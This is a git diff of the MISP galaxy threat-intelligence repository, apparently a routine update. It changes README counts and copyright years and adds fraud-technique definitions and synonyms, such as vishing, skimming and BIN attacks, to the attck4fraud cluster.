diff --git a/README.md b/README.md
index c26d664..64bcb7c 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ Category: *atrm* - source: *https://github.com/microsoft/Azure-Threat-Research-M
[attck4fraud](https://www.misp-project.org/galaxy.html#_attck4fraud) - attck4fraud - Principles of MITRE ATT&CK in the fraud domain
-Category: *guidelines* - source: *Open Sources* - total: *31* elements
+Category: *guidelines* - source: *Open Sources* - total: *71* elements
[[HTML](https://www.misp-project.org/galaxy.html#_attck4fraud)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/attck4fraud.json)]
@@ -55,7 +55,7 @@ Category: *guidelines* - source: *Open Sources* - total: *31* elements
[Backdoor](https://www.misp-project.org/galaxy.html#_backdoor) - A list of backdoor malware.
-Category: *tool* - source: *Open Sources* - total: *14* elements
+Category: *tool* - source: *Open Sources* - total: *16* elements
[[HTML](https://www.misp-project.org/galaxy.html#_backdoor)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/backdoor.json)]
@@ -159,7 +159,7 @@ Category: *first-dns* - source: *https://www.first.org/global/sigs/dns/* - total
[Malpedia](https://www.misp-project.org/galaxy.html#_malpedia) - Malware galaxy cluster based on Malpedia.
-Category: *tool* - source: *Malpedia* - total: *2574* elements
+Category: *tool* - source: *Malpedia* - total: *2823* elements
[[HTML](https://www.misp-project.org/galaxy.html#_malpedia)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/malpedia.json)]
@@ -183,7 +183,7 @@ Category: *misinformation-pattern* - source: *https://github.com/misinfosecproje
[Attack Pattern](https://www.misp-project.org/galaxy.html#_attack_pattern) - ATT&CK tactic
-Category: *attack-pattern* - source: *https://github.com/mitre/cti* - total: *1086* elements
+Category: *attack-pattern* - source: *https://github.com/mitre/cti* - total: *1099* elements
[[HTML](https://www.misp-project.org/galaxy.html#_attack_pattern)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json)]
@@ -287,7 +287,7 @@ Category: *attack-pattern* - source: *https://collaborate.mitre.org/attackics/in
[Intrusion Set](https://www.misp-project.org/galaxy.html#_intrusion_set) - Name of ATT&CK Group
-Category: *actor* - source: *https://github.com/mitre/cti* - total: *148* elements
+Category: *actor* - source: *https://github.com/mitre/cti* - total: *151* elements
[[HTML](https://www.misp-project.org/galaxy.html#_intrusion_set)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-intrusion-set.json)]
@@ -295,7 +295,7 @@ Category: *actor* - source: *https://github.com/mitre/cti* - total: *148* elemen
[Malware](https://www.misp-project.org/galaxy.html#_malware) - Name of ATT&CK software
-Category: *tool* - source: *https://github.com/mitre/cti* - total: *633* elements
+Category: *tool* - source: *https://github.com/mitre/cti* - total: *653* elements
[[HTML](https://www.misp-project.org/galaxy.html#_malware)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-malware.json)]
@@ -359,7 +359,7 @@ Category: *actor* - source: *https://github.com/mitre/cti* - total: *7* elements
[Tool](https://www.misp-project.org/galaxy.html#_tool) - Name of ATT&CK software
-Category: *tool* - source: *https://github.com/mitre/cti* - total: *82* elements
+Category: *tool* - source: *https://github.com/mitre/cti* - total: *84* elements
[[HTML](https://www.misp-project.org/galaxy.html#_tool)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-tool.json)]
@@ -431,7 +431,7 @@ Category: *sector* - source: *CERT-EU* - total: *117* elements
[Sigma-Rules](https://www.misp-project.org/galaxy.html#_sigma-rules) - MISP galaxy cluster based on Sigma Rules.
-Category: *rules* - source: *https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma* - total: *2703* elements
+Category: *rules* - source: *https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma* - total: *2568* elements
[[HTML](https://www.misp-project.org/galaxy.html#_sigma-rules)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json)]
@@ -495,7 +495,7 @@ Category: *tea-matrix* - source: ** - total: *7* elements
[Threat Actor](https://www.misp-project.org/galaxy.html#_threat_actor) - Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. threat-actor-classification meta can be used to clarify the understanding of the threat-actor if also considered as operation, campaign or activity group.
-Category: *actor* - source: *MISP Project* - total: *419* elements
+Category: *actor* - source: *MISP Project* - total: *420* elements
[[HTML](https://www.misp-project.org/galaxy.html#_threat_actor)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/threat-actor.json)]
@@ -503,7 +503,7 @@ Category: *actor* - source: *MISP Project* - total: *419* elements
[Tool](https://www.misp-project.org/galaxy.html#_tool) - threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.
-Category: *tool* - source: *MISP Project* - total: *552* elements
+Category: *tool* - source: *MISP Project* - total: *557* elements
[[HTML](https://www.misp-project.org/galaxy.html#_tool)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/tool.json)]
@@ -515,6 +515,7 @@ Category: *military equipment* - source: *Popular Mechanics* - total: *36* eleme
[[HTML](https://www.misp-project.org/galaxy.html#_uavs/ucavs)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/uavs.json)]
+
# Online documentation
A [readable PDF overview of the MISP galaxy is available](https://www.misp.software/galaxy.pdf) or [HTML](https://www.misp.software/galaxy.html) and generated from the JSON.
@@ -532,12 +533,12 @@ The MISP galaxy (JSON files) are dual-licensed under:
or
~~~~
- Copyright (c) 2015-2022 Alexandre Dulaunoy - a@foo.be
- Copyright (c) 2015-2022 CIRCL - Computer Incident Response Center Luxembourg
- Copyright (c) 2015-2022 Andras Iklody
- Copyright (c) 2015-2022 Raphael Vinot
- Copyright (c) 2015-2022 Deborah Servili
- Copyright (c) 2016-2022 Various contributors to MISP Project
+ Copyright (c) 2015-2023 Alexandre Dulaunoy - a@foo.be
+ Copyright (c) 2015-2023 CIRCL - Computer Incident Response Center Luxembourg
+ Copyright (c) 2015-2023 Andras Iklody
+ Copyright (c) 2015-2023 Raphael Vinot
+ Copyright (c) 2015-2023 Deborah Servili
+ Copyright (c) 2016-2023 Various contributors to MISP Project
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
diff --git a/clusters/attck4fraud.json b/clusters/attck4fraud.json
index 73d0209..2f826de 100644
--- a/clusters/attck4fraud.json
+++ b/clusters/attck4fraud.json
@@ -1,6 +1,7 @@
{
"authors": [
- "Francesco Bigarella"
+ "Francesco Bigarella",
+ "Christophe Vandeplas"
],
"category": "guidelines",
"description": "attck4fraud - Principles of MITRE ATT&CK in the fraud domain",
@@ -24,7 +25,8 @@
"mitigation": "Implementation of DKIM and SPF authentication to detected spoofed email senders; anti-phishing solutions.",
"refs": [
"https://blog.malwarebytes.com/cybercrime/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/",
- "https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/"
+ "https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
],
"victim": "end customer, enterprise"
},
@@ -46,7 +48,11 @@
"mitigation": "Implementation of DKIM and SPF authentication to detected spoofed email senders; flagging email coming from outside the enterprise (enterprise); anti-phishing solutions; awareness training (enterprise).",
"refs": [
"http://fortune.com/2017/04/27/facebook-google-rimasauskas/",
- "https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508"
+ "https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Spear-phishing"
],
"victim": "end customer, enterprise"
},
@@ -77,7 +83,11 @@
"https://krebsonsecurity.com/2014/11/skimmer-innovation-wiretapping-atms/",
"https://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/",
"https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green",
- "https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/"
+ "https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Skimming - CPP ATM"
],
"victim": "end customer, enterprise"
},
@@ -91,7 +101,11 @@
"fraud-tactics:Initiation"
],
"refs": [
- "https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf"
+ "https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Cash Trapping"
]
},
"uuid": "1e709b6e-ff4a-4645-adec-42f9636d38f8",
@@ -122,20 +136,29 @@
"value": "ATM Shimming"
},
{
- "description": "Vishing",
+ "description": "Also known as voice phishing, is the criminal practice of using social engineering over the telephone system to gain access to private personal and financial information from the public for the purpose of financial reward. It is also employed by attackers for reconnaissance purposes to gather more detailed intelligence on a target organisation.",
"meta": {
"kill_chain": [
"fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "308fb88c-412a-4468-91ed-468d07fe4170",
"value": "Vishing"
},
{
- "description": "POS Skimming",
+ "description": "CPP analysis identifies the likely merchant, POS or ATM location from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.",
"meta": {
"kill_chain": [
"fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Skimming - CPP POS"
]
},
"uuid": "c33778e5-b5cc-4d12-8e4e-a329156d988c",
@@ -152,10 +175,13 @@
"value": "Social Media Scams"
},
{
- "description": "Malware",
+ "description": "Software which is specifically designed to disrupt, damage, or gain authorised access to a computer system.",
"meta": {
"kill_chain": [
"fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "6ee0f7cd-a0ef-46c5-9d80-f0fbac2a9140",
@@ -172,10 +198,16 @@
"value": "Account-Checking Services"
},
{
- "description": "ATM Black Box Attack",
+ "description": "Type of Jackpotting attack. Connection of an unauthorized device which sends dispense commands directly to the ATM cash dispenser in order to “cash out” the ATM.",
"meta": {
"kill_chain": [
"fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Black Box Attack"
]
},
"uuid": "6bec22cb-9aed-426a-bffc-b0a78db6527a",
@@ -192,20 +224,29 @@
"value": "Insider Trading"
},
{
- "description": "Investment Fraud",
+ "description": "A deceptive practice in the stock or commodities markets that induces investors to make purchase or sale decisions on the basis of false information, frequently resulting in losses, in violation of securities laws.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "92f5f46f-c506-45de-9a7f-f1128e40d47c",
"value": "Investment Fraud"
},
{
- "description": "Romance Scam",
+ "description": "Romance scam is a confidence trick involving feigning romantic intentions towards a victim, gaining their affection, and then using that goodwill to commit fraud. Fraudulent acts may involve access to the victim's money, bank accounts, credit cards, passports, e-mail accounts, or national identification numbers; or forcing the victims to commit financial fraud on their behalf.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Romance Fraud"
]
},
"uuid": "8ac64815-52c0-4d14-a4e4-4a19b2a6057d",
@@ -232,10 +273,16 @@
"value": "Cash Recovery Scam"
},
{
- "description": "Fake Invoice Fraud",
+ "description": "Invoice fraud happens when a company or organisation is tricked into changing bank account payee details for a payment. Criminals pose as regular suppliers to the company or organisation and will make a formal request for bank account details to be changed or emit false invoices.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Invoice Fraud"
]
},
"uuid": "a0f764d1-b541-4ee7-bb30-21b9a735f644",
@@ -272,20 +319,32 @@
"value": "CxO Fraud"
},
{
- "description": "Compromised Payment Cards",
+ "description": "The loss of or theft of a card, which is subsequently used for illegal purposes until blocked by the card issuer.",
"meta": {
"kill_chain": [
"fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Lost/Stolen Card"
]
},
"uuid": "d46e397f-8957-41f1-8736-13400b9e82fc",
"value": "Compromised Payment Cards"
},
{
- "description": "Compromised Account Credentials",
+ "description": "Account takeover fraud is a form of identity theft in which the fraudster gets access to a victim's bank or credit card accounts -- through a data breach, malware or phishing -- and uses them to make unauthorised transaction.",
"meta": {
"kill_chain": [
"fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Account Takeover Fraud"
]
},
"uuid": "7d71e71c-502f-412a-8fc7-584de8a9d203",
@@ -391,7 +450,514 @@
},
"uuid": "9bfd2f4f-39a7-43fe-b5cd-a345a065276d",
"value": "ATM Explosive Attack"
+ },
+ {
+ "description": "A card not present transaction (CNP, MO/TO, Mail Order / Telephone Order, MOTOEC) is a payment card transaction made where the cardholder does not or cannot physically present the card for a merchant's visual examination at the time that an order is given and payment effected",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "a13829f4-be4b-5ada-8be4-3515b080cf6c",
+ "value": "CNP – Card Not Present"
+ },
+ {
+ "description": "A card present transaction occurs when a cardholder physically presents a card to request and authorise a financial transaction",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "422f283a-19e0-56da-b348-98b5d31fcea6",
+ "value": "CP – Card Present"
+ },
+ {
+ "description": "Fraud that occurs when a merchant account is used without the intention of operating a legitimate business transaction.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "ccd0dcc5-5f86-52fb-8e72-7aa6e8f55f8a",
+ "value": "Merchant Fraud"
+ },
+ {
+ "description": "Fraud that involves virtual currency, or virtual money, which is a type of unregulated, digital money, issued and usually controlled by its developers and used and accepted among the members of a specific virtual community.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "69273dd2-cc8d-5a83-9544-1b6f6a8f8a53",
+ "value": "Virtual Currency Fraud"
+ },
+ {
+ "description": "A category of criminal acts that involve making the unlawful use of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or account-holder's legal ownership. Most methods involve taking advantage the time between the negotiation of the cheque and its clearance at the cheque writer's financial institution to draw out these funds.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b70d490e-7eef-5219-ab93-4ea085bf9361",
+ "value": "Cheque Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via omni- channel means to digital banking or payments channels such as home banking or other electronic services.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "39de6438-4c1f-5bdc-b9a8-5cc3e889eaaf",
+ "value": "Digital Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via mobile devices to digital banking, payments channels such as home banking or other electronic services, or online merchants",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "147b0d04-933c-5244-8c67-33914426d47b",
+ "value": "Mobile Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via land line telephone means to banking or payments channels such as home banking or other electronic services or merchants",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "5e28b366-d9f0-5079-b796-3fa424ec365a",
+ "value": "Telephone Fraud"
+ },
+ {
+ "description": "Fraud occurs when a standing order is falsely created or adulterated. A standing order is an automated method of making payments, where a person or business instructs their bank to pay another person or business, a fixed amount of money at regular intervals. Fraud occurs when a standing order is falsely created or adulterated.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "86e2f55d-cf76-5be8-9cf3-7bfa24d0ea2a",
+ "value": "Standing Order Fraud"
+ },
+ {
+ "description": "A scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential information",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "55a413e3-5eba-5eac-a36b-575bdb2e7cd7",
+ "value": "CEO/BEC Fraud"
+ },
+ {
+ "description": "An illegal process of concealing the origins of money obtained illegally by passing it through a complex sequence of banking transfers or commercial transactions. The overall scheme of this process returns the money to the launderer in an obscure and indirect way.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "d0492296-9ba7-59ad-a510-f8a0526c114a",
+ "value": "Money laundering"
+ },
+ {
+ "description": "Credit cards are produced in BIN ranges. Where an issuer does not use random generation of the card number, it is possible for an attacker to obtain one good card number and generate valid card numbers",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "37ff3b85-80f5-5380-8ce0-defee3ba819f",
+ "value": "BIN Attack"
+ },
+ {
+ "description": "In computing, a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7ca098c2-9f6e-56be-8b32-7f36833803ee",
+ "value": "DoS - Denial of Service Attack"
+ },
+ {
+ "description": "In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "bcd23dee-c9da-548d-9d74-2ed7d71133be",
+ "value": "MITM - Man-in-the-Middle Attack"
+ },
+ {
+ "description": "Unauthorized physical manipulation of ATM cash withdrawal. Appears that cash has not been dispensed – a reversal message generated – SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "2ac0d577-7de1-5cbd-bf8a-30b79cd7f6cc",
+ "value": "Transaction Reversal Fraud"
+ },
+ {
+ "description": "The data contained in an authorisation message is manipulated to try to fool the payment processor.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "fb5b4715-5e6b-5134-a99a-b154b8f2cb84",
+ "value": "Transaction Message Adulteration"
+ },
+ {
+ "description": "Fraud committed against a financial institution by one of its own customers",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "09ac2614-d332-51b4-b7b0-ce3f9a74539b",
+ "value": "First Party (Friendly) Fraud"
+ },
+ {
+ "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b105c344-448c-5d70-bb64-31f0f1246389",
+ "value": "Identity Spoofing (or entity hacking)"
+ },
+ {
+ "description": "A form of fraud in which victims are manipulated into making real-time payments to fraudsters, typically by social engineering attacks involving impersonation.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b36f88c8-3682-5cac-b89d-33f64f91fc94",
+ "value": "Authorised Push Payment Fraud"
+ },
+ {
+ "description": "Direct debit fraud can take place in several ways. It is often associated with identity theft, where the scammer gains access to the bank account information by posing as the victim. They can pay for services and products via a direct debit option and use this account until its owner notices.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "def44822-3b24-5612-b6a2-da77f84fb5d9",
+ "value": "Direct Debit Fraud"
+ },
+ {
+ "description": "Obtaining benefit through coercion",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "e376947a-2e73-5c81-b8d5-7ac8a3ecc7a1",
+ "value": "Extortion"
+ },
+ {
+ "description": "Also known as \"SMS Phishing\", is a form of criminal activity using social engineering techniques. SMS phishing uses cell phone text messages to deliver information and/or requests to induce people to divulge or to take action that will compromise their personal or confidential information.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7607cd1c-c237-55c8-8dc6-d552ca28b86f",
+ "value": "Smishing"
+ },
+ {
+ "description": "Technique used to obtain information such as personal identification numbers (PINs), passwords and other confidential data by looking over the victim's shoulder",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7304230c-a2ba-5f85-915b-21ef2df62c0a",
+ "value": "Shoulder Surfing"
+ },
+ {
+ "description": "The process of diverting the attention of an individual or group from a desired area of focus and thereby blocking or diminishing the reception of desired information.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "cd4a2731-b691-5c91-a608-cf6c431be0ba",
+ "value": "Distraction"
+ },
+ {
+ "description": "Authorised push payment fraud happens when fraudsters deceive consumers or individuals at a business to send them a payment under false pretences to a bank account controlled by the fraudster. As payments made using real-time payment schemes are irrevocable, the victims cannot reverse a payment once they realise they have been conned.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "056a1cf1-0c75-59cc-9d73-f3b5b70ab77e",
+ "value": "Push Payments"
+ },
+ {
+ "description": "Unauthorised software, or authorises software run in an unauthorized manner on ATM PC - SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "956593f4-ff08-523f-995a-6b8c56c101be",
+ "value": "ATM Malware"
+ },
+ {
+ "description": "A data breach is a security incident in which sensitive, protected or confidential data is copied, transmitted, viewed, stolen or used from a PC or Computer Network by an entity unauthorised to do so.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "65c6719e-9daf-578a-8d86-0f65b3054e75",
+ "value": "Data Breach"
+ },
+ {
+ "description": "A type of malicious software designed to block access to a computer system until a sum of money is paid",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "73e1bbdc-1b73-5b84-9f6c-6d13c491bb47",
+ "value": "Ransomware"
+ },
+ {
+ "description": "A website that is not a legitimate venue, the site is designed to entice the visitor into revealing sensitive information, to download some form of malware or to purchase products that never arrive",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "d86ff26f-b9c3-5668-8eef-7a178b6fe158",
+ "value": "Fake Website"
+ },
+ {
+ "description": "Apps in mobile devices that trick users into downloading them. They may also pose as quirky and attractive apps, providing interesting services. Once installed on a mobile device, fake apps can perform a variety of malicious routines.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "8dba8e97-7af4-5e76-8dde-3be54c9e8a6c",
+ "value": "Fake App"
+ },
+ {
+ "description": "Cyber criminals introduce skimming code on e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7f5886b8-06a2-51cc-8428-5cb67615e3b2",
+ "value": "e-Skimming"
+ },
+ {
+ "description": "CPP analysis identifies Payment Terminal parking, transport, fuel, etc. locations, from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "e89436a5-1b58-5676-a34d-d654c59a7d32",
+ "value": "Skimming - CPP UPT"
+ },
+ {
+ "description": "Same as e-Skimming",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "80165f05-1c1d-5f41-96b6-464ac065b052",
+ "value": "Skimming - CPP Virtual Terminal"
+ },
+ {
+ "description": "Unauthorized physical ATM manipulation, preventing card from being returned to customer - SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "493b35ed-9415-5de5-a5cb-298f169cc4f4",
+ "value": "Card Trapping"
+ },
+ {
+ "description": "Patch management is the best practice of upgrading existing software applications to remove any weak security patches that could be exploited by hackers. Lack of proper patching allows cyber criminals to exploit systems and networks.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "0e7a4057-d84b-5451-9006-5a5efe9e948a",
+ "value": "Lack of Patching / Security"
+ },
+ {
+ "description": "Process where an information system is deployed into a Production Environed with faults, errors or vulnerabilities",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b132c566-7656-5b2b-b157-5734c9e30cc8",
+ "value": "Bad implementation"
+ },
+ {
+ "description": "Implementation of a system, solution or service not according to defined and tested best practices.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
